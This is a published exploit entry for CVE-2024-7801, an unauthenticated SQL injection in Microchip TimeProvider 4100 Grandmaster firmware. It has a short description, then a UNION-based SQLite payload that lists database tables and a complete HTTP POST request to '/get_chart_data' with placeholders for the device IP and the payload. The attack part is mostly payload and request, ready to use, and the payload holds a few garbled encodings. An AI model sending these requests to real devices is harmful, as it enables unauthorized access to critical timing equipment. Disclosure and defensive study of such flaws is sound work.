<\/p>\n
# Exploit Title: Microchip TimeProvider 4100 Grandmaster - Unauthenticated SQL Injection
\n
\n# Exploit Author: Armando Huesca Prida, Marco Negro
\n
\n# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
\n
\n# Date of Disclosure: 27\/06\/2024
\n
\n# Date of CVE Publication: 4\/10\/2024
\n
\n# Exploit Publication: 11\/10\/2024
\n
\n# Vendor Homepage: https:\/\/www.microchip.com\/
\n
\n# Version: Firmware release 1.0 through 2.4.7
\n
\n# Tested on: Firmware release 2.3.12
\n
\n# CVE: CVE-2024-7801
\n
\n# External References:
\n
\n# URL: https:\/\/www.cve.org\/cverecord?id=CVE-2024-7801
\n
\n# URL: https:\/\/www.0xhuesca.com\/2024\/10\/cve-2024-7801.html
\n
\n# URL: https:\/\/www.microchip.com\/en-us\/solutions\/technologies\/embedded-security\/how-to-report-potential-product-security-vulnerabilities\/timeprovider-4100-grandmaster-unathenticated-sql-injection
\n
\n# URL: https:\/\/www.gruppotim.it\/it\/footer\/red-team.html
\n
\n
\n
\n
\n
\n# Vulnerability Description:
\n
\n
\n
\nThe TimeProvider\u00ae 4100 Grandmaster firmware has a SQL injection vulnerability in the \u201cget_chart_data\u201d web resource, specifically the \u201cchannelId\u201d parameter is inserted directly into the SQL query (SQLite) at the table's name query parameter from which the FROM operation is performed. Unauthenticated threat actors can manipulate queries to execute malicious SQL commands against the device.
\n
\n
\n
\n
\n
\n# Example of Malicious SQL Payload:
\n
\n
\n
\nSELECT%20sql%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master$20WHERE&20type='table'$20LIMIT%201%20OFFSET%200--
\n
\n
\n
\n
\n
\n# Proof of Concept - PoC:
\n
\n
\n
\nBy manually modifying the following request, it is possible to execute malicious SQL commands against the device. The list of values \u200b\u200bthat must be updated in the exploit HTTP request is given below:
\n
\n- [malicious SQL payload]
\n
\n- [device IP]
\n
\n
\n
\n
\n
\n# Exploit - HTTP Request:
\n
\n
\n
\nPOST \/get_chart_data HTTP\/1.1
\n
\nHost: [device IP]
\n
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0
\n
\nAccept: application\/json, text\/javascript, *\/*; q=0.01
\n
\nAccept-Language: en-US,en;q=0.5
\n
\nAccept-Encoding: gzip, deflate, br
\n
\nContent-Type: application\/x-www-form-urlencoded; charset=UTF-8
\n
\nX-Requested-With: XMLHttpRequest
\n
\nContent-Length: 146
\n
\nOrigin: https:\/\/[device IP]
\n
\nReferer: https:\/\/[device IP]\/perfmon_synce_stat
\n
\nSec-Fetch-Dest: empty
\n
\nSec-Fetch-Mode: cors
\n
\nSec-Fetch-Site: same-origin
\n
\nTe: trailers
\n
\nConnection: keep-alive
\n
\n
\n
\nmetric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=
\n
\n1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1
\n
\n
\n
\n
\n
\n
\n
\n# End\n <\/code><\/pre>\n<\/p><\/div>\n